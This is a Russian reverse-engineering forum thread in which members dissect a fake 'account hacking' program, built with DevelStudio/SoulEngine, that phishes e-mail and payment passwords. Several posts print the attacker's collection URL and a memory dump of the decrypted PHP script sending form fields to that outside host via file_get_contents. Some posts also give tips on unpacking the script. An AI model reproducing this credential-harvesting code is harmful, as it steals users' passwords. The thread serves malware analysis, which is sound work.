eXeLab
eXeL@B ВИДЕОКУРС !

ВИДЕОКУРС
выпущен 4 ноября!


УЗНАТЬ БОЛЬШЕ >>
Домой | Статьи | RAR-cтатьи | FAQ | Форум | Скачать | Видеокурс
Новичку | Ссылки | Программирование | Интервью | Архив | Связь

Русский / Russian English / Английский

Сейчас на форуме: UniSoft
 · Начало · Статистика · Регистрация · Поиск · ПРАВИЛА ФОРУМА · Язык · RSS · SVN ·

 eXeL@B —› Протекторы —› develstudio - SoulEngine
Посл.ответ Сообщение


Ранг: 469.0 (мудрец)
Статус: Участник
[www.AHTeam.org]

Создано: 22 апреля 2013 02:09 New!
Цитата · Личное сообщение · #1

Поискал, вроде похожих тем нет. Попросили меня покопать одну программку, собственно вот она:

видео http://www.youtube.com/watch?v=Y-4SMzHonpU
ну и ссылочка http://yadi.sk/d/VH_X4d3A3KClt

Программко конечно развод, но судь не в этом (просто отслылает данные формы на сторонний сайт :

http://xaker-g.host56.com/s/s.gif?E-mail:Ty_loshara|E-mail-password:HujTebe|%CF%CF-password:ugaday


интерпритирует скрипт --> SoulEngine <--

Хотелось бы в конечном итоге иметь возможность более продуктивно и удобно анализировать подобный софт.
Может кто сталкивался уже с SoulEngine? Есть ли декомпиляторы / выдиралки скрипта?


Ранг: 1013.7 (!!!!)
Статус: Участник

Создано: 22 апреля 2013 02:47 New!
Цитата · Личное сообщение · #2

по что антивирусы ее не любят?
вконце екзешника php скрипт, пожат и забейзен 64
так что восстановить можно, дерзайте


Ранг: 469.0 (мудрец)
Статус: Участник
[www.AHTeam.org]

Создано: 22 апреля 2013 02:58 · Поправил: KingSise New!
Цитата · Личное сообщение · #3

reversecode, полезно...
а я тут начал инжектиться в php5ts.inflate, подгружается из темпа виды, куда до этого распаковывается порогой. На выходе в esi указатель на расшифрованный код.

в данном случае у мну:

Code:
  1. 01CD12E0  a:1:{s:5:"form1";a:2:{s:6:"timer1";a:1:{s:7:"ontimer";s:225:"c("
  2. 01CD1320  progress1")->position +=10;..$time = c("progress1")->position;..
  3. 01CD1360  if($time==100){..c("timer1")->enable = false;..messageDlg("Ошибк
  4. 01CD13A0  а #2002. Неправильно данные или сервер не отвечает?", mtInformat
  5. 01CD13E0  ion, MB_OK);..app::close();..}";}s:7:"button1";a:1:{s:7:"onclick
  6. 01CD1420  ";s:1209:"$edit2 = null;..$edit3 = null;..$edit4 = null;..$edit1
  7. 01CD1460   = c('Form1->edit1')->text;..$edit2 = c('Form1->edit2')->text;..
  8. 01CD14A0  $edit3 = c('Form1->edit3')->text;..$edit4 = c('Form1->edit4')->t
  9. 01CD14E0  ext;..if ($edit1==null) MessageBox("Поле для ввода e-mail пусто!
  10. 01CD1520  ","Ошибка!");..else..if ($edit2==null) MessageBox("Поле для ввод
  11. 01CD1560  а пароль электронной почты пусто!","Ошибка!");..else..if ($edit3
  12. 01CD15A0  ==null) MessageBox("Поле для ввода номер счета пусто!","Ошибка!"
  13. 01CD15E0  );..else..if ($edit4==null) MessageBox("Поле для ввода платежный
  14. 01CD1620   пароль пусто!","Ошибка!");..else..{..$edit1 = c('Form1->edit1')
  15. 01CD1660  ->text;..$edit2 = c('Form1->edit2')->text;..$edit4 = c('Form1->e
  16. 01CD16A0  dit4')->text;..$combobox1 = c('Form1->combobox1')->inText;..$url
  17. 01CD16E0   = "http://xaker-g.host56.com/s/s.gif";..file_get_contents($url
  18. 01CD1720  . "?" . "E-mail:" . $edit1 . "|E-mail-password:" . $edit2 . "|ПП
  19. 01CD1760  -password:" . $edit4);..c("timer1")->enable
  20.  



Покапаю конец файла, спасибо за наводку...



(add)


reversecode пишет:
вконце екзешника php скрипт, пожат и забейзен 64


Кагбэ да, но если его раскодировать, как то он не совсем похож на оригенал (см. выше)

{ Атач доступен только для участников форума } - 2e80106aa355b6a91a9704c57e8a5076.phpe2

Ранг: 84.0 (постоянный)
Статус: Участник

Создано: 22 апреля 2013 10:18 New!
Цитата · Личное сообщение · #4

Вот такая бойда после раскода

{ Атач доступен только для участников форума } - Decod.rar


Ранг: 1013.7 (!!!!)
Статус: Участник

Создано: 22 апреля 2013 11:00 New!
Цитата · Личное сообщение · #5

дебейзили? а де безип2 кто будет делать?


Ранг: 469.0 (мудрец)
Статус: Участник
[www.AHTeam.org]

Создано: 22 апреля 2013 11:46 New!
Цитата · Личное сообщение · #6

reversecode пишет:
безип2 кто будет делать?


Так вроде бы в безип2 сигнатура BZh должна быть, а ее нету...


Ранг: 111.0 (ветеран)
Статус: Участник

Создано: 22 апреля 2013 20:13 · Поправил: Rainbow New!
Цитата · Личное сообщение · #7

xaker-g(point)host56(point)com/s/log.php
...
Как много в этой ссылке..

Ранг: 46.8 (посетитель)
Статус: Участник

Создано: 22 апреля 2013 21:49 New!
Цитата · Личное сообщение · #8

Там уже ничего нет, или новенький или кто то почистил.


Ранг: 111.0 (ветеран)
Статус: Участник

Создано: 22 апреля 2013 22:00 · Поправил: Модератор New!
Цитата · Личное сообщение · #9

Alinator3500 пишет:
Там уже ничего нет, или новенький или кто то почистил.


Вычищено.
P.S. После моего поста была создана тема про исходники win7 с гей-порно-картинкой. Меня это насторожило ))) Видимо аффтар таким образом высказал свое "негодуэ" после прочтения поста.
P.S.S. Афтар, ничего личного. Изъян налицо
От модератора: нет-нет, это местный дурачок 00, он же 2013, он же типа дева с татухой недавняя и тд, снова анально уязвлён, что его забанили и пинка дали

Да на самом деле-то и ценного там ничего не было.. около 10-20 уникальных мыльников с паролями и все.


Ранг: 469.0 (мудрец)
Статус: Участник
[www.AHTeam.org]

Создано: 22 апреля 2013 23:52 · Поправил: KingSise New!
Цитата · Личное сообщение · #10

Rainbow пишет:
Вычищено.


Да куда там, я только что почистел, до сих пор ведутся...


скрин номер раз (платежный ароль имееццо):







Теперь по теме: пропатчил длл php5ts.dll, теперь она выдает окошко со скриптом, который уже расшифрован. Вс работает заебушечки, но только под отладчиком. Ясный перь, гдето проверка црц есть, но мне копать дольше копать влом, бо и так сойдет, но мож если у кого время лишнее будет, был бы признателен за намек.


Наблюдение номер 2:



Эти файлы (темп винды) не удаляются, т.е. пограммулина темп не чистит и при запуске не перезаписывает. Так что если оставить пропатченную длл там, то можно больше не заморачиваться, она будет заюзана.


и самое интересное:



наютубике
1. пишем "взлом...."
2. Фильтер: "за послебнюю неделю"
3......
4. PROFIT


Ранг: 111.0 (ветеран)
Статус: Участник

Создано: 22 апреля 2013 23:54 New!
Цитата · Личное сообщение · #11

Грац ! Просто было лень раскручивать


Ранг: 111.0 (ветеран)
Статус: Участник

Создано: 22 апреля 2013 23:57 New!
Цитата · Личное сообщение · #12

IP: 66.249.75.14 (whois)
QUERY:
REFERER:
AGENT: Googlebot-Image/1.0

Понеслась...


Ранг: 469.0 (мудрец)
Статус: Участник
[www.AHTeam.org]

Создано: 23 апреля 2013 00:37 · Поправил: KingSise New!
Цитата · Личное сообщение · #13

Rainbow пишет:
Вс работает заебушечки, но только под отладчиком


Хм, под отладчиком работает только на рабочем компе, на ноуте все ок. Отбой. Хз, что это было...

Как и говорил раньше, самое простое решение посмотреть что на входе у php5ts.inflate



з.ы. а программку то писала девочко:


у нее на канале еще пару ведюшек есть похожих...


[добавлено]

для особо ленивых но желающих узнать, как школьники узнали как быстро кодить не детектируемые малвари, вот видео: http://www.youtube.com/watch?v=-a-ldQIhDlA
Таких видяшек полно, так что эпиемия пятиметровых мэлварий и винлукиров не за горами уже есть.


[добавлено]
а этот самородок ломает вконтакте даже без подключения интернета, обратите внимания на ошибки генерируемые в develstudio где просматриваются стенные пути и функционал.
http://www.youtube.com/watch?v=5Ur17CDnwqE

Ранг: 18.2 (новичок)
Статус: Участник

Создано: 23 апреля 2013 11:16 New!
Цитата · Личное сообщение · #14

KingSise пишет:
как школьники узнали как быстро кодить не детектируемые малвари, вот видео


С выходом из анабиоза =) Школьники давно уже на develstudio лабают вирусню и видео полно. Если порыться на форуме develstudio то можно найти тему где-то годичной давности, где авторы писали, что выпилили автоматическое сжатие UPX, т.к. много малвари пишут :D (там раньше галочка была, сжимать сразу upx).

KingSise пишет:
ак что эпиемия пятиметровых мэлварий и винлукиров не за горами


reversecode пишет:
по что антивирусы ее не любят?


Вот за это и не любят, и при этом большинство, особо не разбираясь, детектят сразу стаб develstudio :D Авторы там же на форуме плакались =)


Ранг: 469.0 (мудрец)
Статус: Участник
[www.AHTeam.org]

Создано: 23 апреля 2013 14:14 · Поправил: KingSise New!
Цитата · Личное сообщение · #15

Интересный глюк заметил - эта тема нигде не отображалась, пока через профиль в нее не зайдешь и не отправишь что то....

gloomdemon пишет:
:D Авторы там же на форуме плакались =


Ну а как еще детектить, если программа вредоносного нечего не делает, просто кнопку отправить переименовали в взломать.


Ранг: 111.0 (ветеран)
Статус: Участник

Создано: 23 апреля 2013 14:47 New!
Цитата · Личное сообщение · #16

Суть бага данного снифака не только в ПО. Данный(е) деятель(и) реально школьники после видеотутора
 eXeL@B —› Протекторы —› develstudio - SoulEngine

Оригинальный DVD-ROM: eXeL@B DVD !

Вы находитесь на форуме сайта EXELAB.RU
Проект ReactOS